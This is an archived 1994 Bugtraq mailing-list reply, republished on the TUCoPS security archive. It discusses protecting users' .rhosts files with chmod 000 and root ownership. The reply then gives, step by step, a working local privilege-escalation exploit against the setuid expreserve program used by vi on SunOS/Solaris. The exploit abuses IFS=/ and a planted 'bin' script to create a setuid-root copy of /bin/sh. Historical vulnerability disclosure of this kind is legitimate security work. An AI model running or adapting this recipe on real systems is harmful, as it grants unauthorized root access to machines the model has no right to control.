TUCoPS :: SunOS/Solaris :: sol_expr.txt

Chmod 000 .rhosts - commentary 


From bugtraq-owner@fc.net Sat Oct 15 10:04:41 1994
Status: RO
X-VM-v5-Data: ([nil nil nil nil nil nil nil nil nil]
        ["1213" "Sat" "15" "October" "1994" "04:21:20" "-0700" "Charles Howes"
"chowes@helix.net" nil "39" "Re: chmod 000 .rhosts - works?" "^From:" nil nil "
10" nil "chmod 000 .rhosts - works?" nil nil]
        nil)
Return-Path: <bugtraq-owner@fc.net>
Received: from villa.fc.net by spy.org (4.1/SPY-4.1)
        id AA08281; Sat, 15 Oct 94 09:53:19 MDT
X-Spy1:    /\     Computer Systems Consulting      WWW    http://www.spy.org/
X-Spy2:  / \  \   P.O. Box 5178                    EMAIL  listserv@spy.org
X-Spy3:  \  \ /   Santa Fe, NM 87502-5178          FTP    ftp.spy.org
X-Spy4:    \/     Phone: (505) 984-0085            GOPHER gopher.spy.org
Received: from freeside.fc.net (freeside.fc.net [198.6.198.2]) by villa.fc.net
(8.6.8.1/8.6.6) with ESMTP id GAA04451 for <bugtraq-outgoing@villa.fc.net>; Sat
, 15 Oct 1994 06:22:51 -0500
Received: (from majordom@localhost) by freeside.fc.net (8.6.8.1/8.6.6) id GAA18
516 for bugtraq-outgoing@villa.fc.net; Sat, 15 Oct 1994 06:23:24 -0500
Received: from trance.helix.net (helix.net [142.231.37.2]) by freeside.fc.net (
8.6.8.1/8.6.6) with ESMTP id GAA18505 for <bugtraq@fc.net>; Sat, 15 Oct 1994 06
:23:06 -0500
Received: (from chowes@localhost) by trance.helix.net (8.6.9/Trance.helix.net 8
.6.9) id EAA20497; Sat, 15 Oct 1994 04:21:23 -0700
In-Reply-To: <Pine.BSI.3.90.941015132013.18469G-100000@darwin.technet.sg>
Message-Id: <Pine.SUN.3.90.941015041159.20362A-100000@trance.helix.net>
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: bugtraq-owner@crimelab.com
Precedence: bulk
From: Charles Howes <chowes@helix.net>
Subject: Re: chmod 000 .rhosts - works?
Date: Sat, 15 Oct 1994 04:21:20 -0700 (PDT)
To: James Seng <jseng@darwin.technet.sg>
Cc: Norwell Louis Awson <nlawson@galaxy.csc.calpoly.edu>, bugtraq@fc.net

On Sat, 15 Oct 1994, James Seng wrote:

> Anyway, what i did on my system is put a .rhosts file in every user
> directory. chmod 000 .rhosts and chown root .rhosts. Not all user needs
> .rhosts file. Those who wants to use them email me and i will chown back
> to them. (any problem with that? :-)
>
> James Seng Ching Hong ~{W/Uq:j~}
> Technet Student Consultant, Technet Unit
> Internet: jseng@solomon.technet.sg

If the users own their home directories, then what prevents them from
removing that file?
  Oh, I detect an OS-dependent feature here...

ObBug: vi runs expreserve when it crashes or you type ':pre' (on some
  versions).  Expreserve is setuid root.  Expreserve runs /bin/mail
  with 'system()'.  So, do the following:
    % cd /tmp
    % cp /bin/sh fubar
    % cat > bin
    chmod 4755 fubar
    ^D
    % chmod u+x fubar
    % setenv IFS=/
    % vi
    :pre
    :q
    % fubar
    #
  Some versions of expreserve don't have the hole.
  Some versions of vi don't have the :pre command.
  One does not imply the other.

Argh.  Am I repeating 8lgm material here?
--
Charles Howes -- chowes@helix.net
 Always tell the truth, then you make it the other bloke's problem!
 - Sean Connery, 1971

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH